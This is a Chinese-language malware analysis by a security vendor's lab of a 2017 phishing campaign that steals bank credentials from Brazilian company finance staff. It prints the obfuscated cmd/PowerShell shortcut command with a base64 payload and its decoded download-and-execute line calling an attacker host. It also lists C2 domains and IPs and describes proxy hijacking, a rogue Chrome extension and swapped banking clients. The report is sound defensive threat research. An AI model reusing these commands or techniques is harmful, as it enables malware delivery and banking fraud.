【技术分享】针对巴西商业公司财务的攻击事件分析

【技术分享】针对巴西商业公司财务的攻击事件分析

2017-09-28 15:28:01

阅读：1214次
点赞(0)
收藏
来源：安全客

【技术分享】针对巴西商业公司财务的攻击事件分析

作者：360天眼实验室

【技术分享】针对巴西商业公司财务的攻击事件分析

1. 概述

9月14日到9月20（特别是9月19、20日两天），360威胁情报中心发现一批具有相似特征的钓鱼邮件，这些钓鱼邮件的语言均为葡萄牙语，投递目标为巴西的商业公司，使用的payload主要为powershell和AutoIt编写，这引起了我们分析人员的注意。经过分析，确定这是一起针对巴西境内商业公司财务人员的定向攻击，攻击目标为盗取银行账户。

2. 目标

a.葡萄牙语

b.巴西商业公司的人力资源、财务人员

c.邮件内容通常如下：

翻译：

亲爱的先生确定你没有收到我的第一封电子邮件，我会按照约定寄给你我的简历。所需的其他信息包含在附件课程的第二张表中。
【技术分享】针对巴西商业公司财务的攻击事件分析

翻译：

此消息是指服务提供商的电子服务税务说明-NFS-e号51523245：公司名称：PAYPALDOBRASILSERVICOSDEPAGAMENTOSLTDA 电子信箱：notificacoes@paypal.com CCM：3,932,128-2 CNPJ：10,878,448/0001-66 我们建议您在MillionNoteSystem中注册一个安全短语，将出现在发送给您的所有消息中。安全短语保证该消息由圣保罗市发送，并阻止收件人打开可能包含计算机病毒的邮件。附上是发票nf=51523245＆cod=MIJ6BFFP ……
3. 分析

将邮件中的附件解压后，是一个html的快捷方式，该快捷方式的链接目标如下，双击快捷方式后，会以base64编码后的恶意代码作为参数启动powershell.exe执行，然后再启动iexplore.exe迷惑受害人。

C:\windows\system32\cmd.exe/V/C"setmq=hell^-e^n^c&&setwx=pOwErs&&start!wx!!mq!bwB1AHUAOwBpAEUAeAAoAE4AZQBXAC0AbwBCAEoAZQBDAHQAIABOAEUAdAAuAFcAZQBiAEMAbABJAEUATgB0ACkALgBEAE8AdwBuAEwATwBBAEQAcwB0AFIASQBuAEcAKAAnAGgAdAB0AHAAOgAvAC8AOQAxADMANQAzADEANwA5ADIALgByAC4AcwAtAGMAZABuAC4AbgBlAHQALwB2ADIALwBnAGwALgBwAGgAcAA/AGEASABSADAAYwBEAG8AdgBMAHoAawB4AE0AegBVAHoATQBUAGMANQBNAGkANQB5AEwAbgBNAHQAWQAyAFIAdQBMAG0ANQBsAGQAQwA5ADIATQBuAHgAdwBWAEUAcABaACcAKQA="-%ProgramFiles%\Internet Explorer\iexplore.exe

解码后

iEx(NeW-oBJeCtNEt.WebClIENt).DOwnLOADstRInG('http://913531792.r.s-cdn.net/v2/gl.php?aHR0cDovLzkxMzUzMTc5Mi5yLnMtY2RuLm5ldC92MnxwVEpZ') Powershell启动后，会从hxxp://913531792[.]r.s-cdn[.]net/v2/gl.php?aHR0cDovLzkxMzUzMTc5Mi5yLnMtY2RuLm5ldC92MnxwVEpZ下载一段代码，如下：
【技术分享】针对巴西商业公司财务的攻击事件分析

可以看见这段代码的功能很简单，从hxxp://913531792[.]r.s-cdn[.]net/v2/gd.php下载并异或0x6A解密出一个名为Loader的dll，然后将其加载，接着通过Loader的Go方法(参数为"hxxp://913531792[.]r.s-cdn[.]net/v2","pTJY")开始下一步流程，最后生成一个vbs脚本用于启动Loader中指定的文件，并生成指向该vbs脚本的快捷方式，打开快捷方式启动vbs脚本。

由于Loader中下载的文件已经无法下载，而我们目前只知道该样本是一个downloader，更具体的恶意行为无法获得，也就不能确定攻击者的最终目的，通常的分析到这里就只能终止了。应付这种情况的一个常用方法是寻找同源样本，无论是历史样本还是更新的存活样本，都能够对样本的行为进行有效的还原，而且在寻找同源样本时获取的其他信息也能进一步对攻击者的画像进行勾勒。

通过360威胁情报中心(ti.360.net)搜索913531792.r.s-cdn.net,我们找到了更多的样本，以及该域名曾解析到的ip地址46.231.178.38、87.238.165.100、46.231.178.51、37.220.34.247等信息。

进一步搜索这些IP地址的信息，发现另一个作为C&C的域名hictip.r.worldssl.net及其关联样本：

其中有一个MD5为b5ef9c4c82b2bef4743b30481232ecc8的AutoIt样本，对其的分析让我们得到了更多的结果。该样本会从hxxps://github[.]com/fl20177/Flash/raw/Update/fl.exe下载一个文件，然后访问hxxp://94[.]229.78.156/cd/controller.php。下载回来的fl.exe也是一个AutoIt编译成PE的可执行程序，其反编译后的代码正是前面提到过的powershell调用代码。
【技术分享】针对巴西商业公司财务的攻击事件分析

那么现在我们得到了关于攻击者的一些新的信息，一个github地址和一个ip：

hxxps://github[.]com/fl20177 94[.]229.78.156

访问攻击者在Github上的账号https://github.com/fl20177，可以发现这个账号是攻击者特地为这次攻击注册的，在9月5日注册。

接着发现其github上的项目https://github.com/fl20177/Flash 中还有一个新的样本：zer.exe。下载回来反编译后如下，注释部分是对代码功能的说明：

该样本首先修改注册表项修改HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL，这个注册表项对应的是IE的自动代理配置，可以指定一个脚本让IE对符合条件的域名使用指定的代理。这里的指定的代理配置脚本为hxxp://www[.]vijfheerenlandendigitaal.nl/ec/tfiles.txt, 内容如下，其指定了当访问桑坦德银行、巴西布拉德斯科银行、花旗银行、巴西联邦储蓄银行等网址时，使用代理服务器94.229.78.156，攻击者获取到受害者的访问流量后，可以返回伪造的钓鱼页面获取受害者的银行账号密码。
【技术分享】针对巴西商业公司财务的攻击事件分析

同时，样本还从hxxps://www[.]yourlifeinthesun.com/manifest.zip下载一个chrome的扩展插件，并替换掉chrome的快捷方式，为其加上“--load-extension=”的启动参数，让chrome启动时默认加载这个插件，插件主要作用是当受害人用chrome访问上面提到的银行网址时，禁用掉使其不可访问，从而诱导受害人使用IE浏览器进行访问。
【技术分享】针对巴西商业公司财务的攻击事件分析

而且样本还会下载并替换掉Aplicativo Bradesco.exe(巴西布拉德斯科银行的PC客户端软件)、itauaplicativo.exe（巴西伊塔乌投资银行的PC客户端软件），替换后的软件点击后只会弹出窗口提示：“系统不可用，请通过浏览器登录您的帐号。”，这也是一种诱导受害人通过浏览器登录银行账号的手段。